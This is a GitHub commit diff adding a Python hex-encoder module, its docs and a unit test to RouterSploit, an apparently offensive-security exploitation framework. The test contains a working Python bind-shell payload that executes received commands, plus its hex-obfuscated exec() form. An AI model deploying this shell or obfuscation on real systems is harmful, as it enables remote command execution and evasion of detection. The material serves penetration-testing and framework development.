File tree Expand file tree Collapse file tree 3 files changed +72
-0
lines changed
docs/modules/encoders/python
routersploit/modules/encoders/python Expand file tree Collapse file tree 3 files changed +72
-0
lines changed Original file line number Diff line number Diff line change 1+ ## Description
2+
3+ Module encodes Python payload to hex format.
4+
5+ ## Verification Steps
6+
7+ 1 . Start ` ./rsf.py `
8+ 2 . Do: ` use encoders/python/hex `
9+ 3 . Do: ` show info `
10+
11+ ## Scenarios
12+
13+ ```
14+ rsf > use encoders/python/hex
15+ rsf (Python Hex Encoder) > show info
16+
17+ Name:
18+ Python Hex Encoder
19+
20+ Description:
21+ Module encodes Python payload to Hex format.
22+
23+ Authors:
24+ - Marcin Bury <marcin[at]threat9.com>
25+ ```
Original file line number Diff line number Diff line change 1+ from routersploit .core .exploit .encoders import BaseEncoder
2+ from routersploit .core .exploit .payloads import Architectures
3+
4+
5+ class Encoder (BaseEncoder ):
6+ __info__ = {
7+ "name" : "Python Hex Encoder" ,
8+ "description" : "Module encodes Python payload to Hex format." ,
9+ "authors" : (
10+ "Marcin Bury <marcin[at]threat9.com>" , # routersploit module
11+ ),
12+ }
13+
14+ architecture = Architectures .PYTHON
15+
16+ def encode (self , payload ):
17+ encoded_payload = bytes (payload , "utf-8" ).hex ()
18+ return "exec('{}'.decode('hex'))" .format (encoded_payload )
Original file line number Diff line number Diff line change 1+ from routersploit .modules .encoders .python .hex import Encoder
2+
3+
4+ # python bind tcp payload with rport=4321
5+ bind_tcp = (
6+ "import socket,os\n " +
7+ "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n " +
8+ "so.bind(('0.0.0.0',4321))\n " +
9+ "so.listen(1)\n " +
10+ "so,addr=so.accept()\n " +
11+ "x=False\n " +
12+ "while not x:\n " +
13+ "\t data=so.recv(1024)\n " +
14+ "\t stdin,stdout,stderr,=os.popen3(data)\n " +
15+ "\t stdout_value=stdout.read()+stderr.read()\n " +
16+ "\t so.send(stdout_value)\n "
17+ )
18+
19+ # python bind tcp payload with rport=4321 encoded with python/hex
20+ bind_tcp_encoded = (
21+ "exec('696d706f727420736f636b65742c6f730a736f3d736f636b65742e736f636b657428736f636b65742e41465f494e45542c736f636b65742e534f434b5f53545245414d290a736f2e62696e64282827302e302e302e30272c3433323129290a736f2e6c697374656e2831290a736f2c616464723d736f2e61636365707428290a783d46616c73650a7768696c65206e6f7420783a0a09646174613d736f2e726563762831303234290a09737464696e2c7374646f75742c7374646572722c3d6f732e706f70656e332864617461290a097374646f75745f76616c75653d7374646f75742e7265616428292b7374646572722e7265616428290a09736f2e73656e64287374646f75745f76616c7565290a'.decode('hex'))"
22+ )
23+
24+
25+ def test_payload_enconding ():
26+ """ Test scenario - payload encoding """
27+
28+ encoder = Encoder ()
29+ assert encoder .encode (bind_tcp ) == bind_tcp_encoded
You can’t perform that action at this time.
0 commit comments